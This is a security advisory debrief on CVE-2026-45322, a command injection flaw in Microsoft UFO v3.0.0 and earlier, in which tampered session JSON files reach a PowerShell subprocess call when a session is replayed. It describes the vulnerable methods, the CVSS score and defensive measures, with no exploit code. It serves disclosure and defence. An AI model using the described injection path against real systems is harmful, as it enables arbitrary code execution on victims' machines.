PatchSiren cyber security CVE debrief
CVE-2026-45322 microsoft CVE debrief
CVE-2026-45322 is a high-severity OS command injection vulnerability in the Microsoft UFO open-source framework for intelligent automation. The vulnerability exists in tagged releases up to and including v3.0.0, specifically within the shell action replay path. The root cause is improper neutralization of special elements used in OS commands (CWE-78), where ShellReceiver.run_shell() passes a command string from action parameters directly to subprocess.Popen() with shell=True and executable=powershell.exe. The same vulnerable shell-execution behavior is reachable through ShellReceiver.execute_command(). These shell receiver methods are invoked by action classes including RunShellCommand.execute() and ExecuteCommand.execute(), which forward stored action parameters without adequate sanitization. Because UFO stores planned and executed actions in per-session JSON records, an attacker with write or modify access to a session/action JSON file can inject a malicious shell action. When the session is resumed or replayed, UFO executes the attacker's command with the privileges of the UFO process user. The CVSS 3.1 vector (AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H) indicates a local attack vector with low attack complexity, requiring low privileges but no user interaction, resulting in high impact to confidentiality, integrity, and availability. The vulnerability was published on 2026-05-27. Organizations using Microsoft UFO should upgrade to a version beyond v3.0.0 once available, restrict write access to session/action JSON files, and validate or sanitize action parameters before shell execution.
- Vendor
- microsoft
- Product
- UFO
- CVSS
- HIGH 7.8
- CISA KEV
- Not listed in stored evidence
- Original CVE published
- 2026-05-27
- Original CVE updated
- 2026-05-28
- Advisory published
- 2026-05-27
- Advisory updated
- 2026-05-28
Who should care
Organizations using Microsoft UFO for intelligent automation across Windows environments, particularly those enabling session recording and replay functionality. Security teams responsible for supply chain and open-source component risk management. Developers building automation workflows with UFO who may process untrusted session data.
Technical summary
The vulnerability stems from ShellReceiver.run_shell() and ShellReceiver.execute_command() methods in Microsoft UFO v3.0.0 and earlier, which pass unsanitized command strings from action parameters to subprocess.Popen() with shell=True and executable=powershell.exe. Action classes RunShellCommand and ExecuteCommand forward stored parameters to these vulnerable methods. The framework's persistence of actions in per-session JSON records creates an attack vector where malicious command injection into these JSON files results in arbitrary code execution upon session resume or replay.
Defensive priority
HIGH
Recommended defensive actions
- Upgrade Microsoft UFO to a version newer than v3.0.0 when available
- Restrict file system permissions on UFO session/action JSON files to prevent unauthorized modification
- Implement input validation and sanitization for action parameters before shell execution
- Monitor for anomalous PowerShell process executions originating from UFO processes
- Review and audit existing session/action JSON files for injected commands before replay
- Consider disabling session replay functionality in production environments if not required
Evidence notes
Vulnerability description sourced from official CVE record and NVD entry. Technical details confirmed via GitHub Security Advisory GHSA-wj72-7w8h-695f. CWE-78 classification and CVSS 3.1 scoring from NVD source data. Affected versions explicitly stated as up to and including v3.0.0.
Official resources
-
CVE-2026-45322 CVE record
CVE.org
-
CVE-2026-45322 NVD detail
NVD
-
Source item URL
nvd_modified
- Source reference
2026-05-27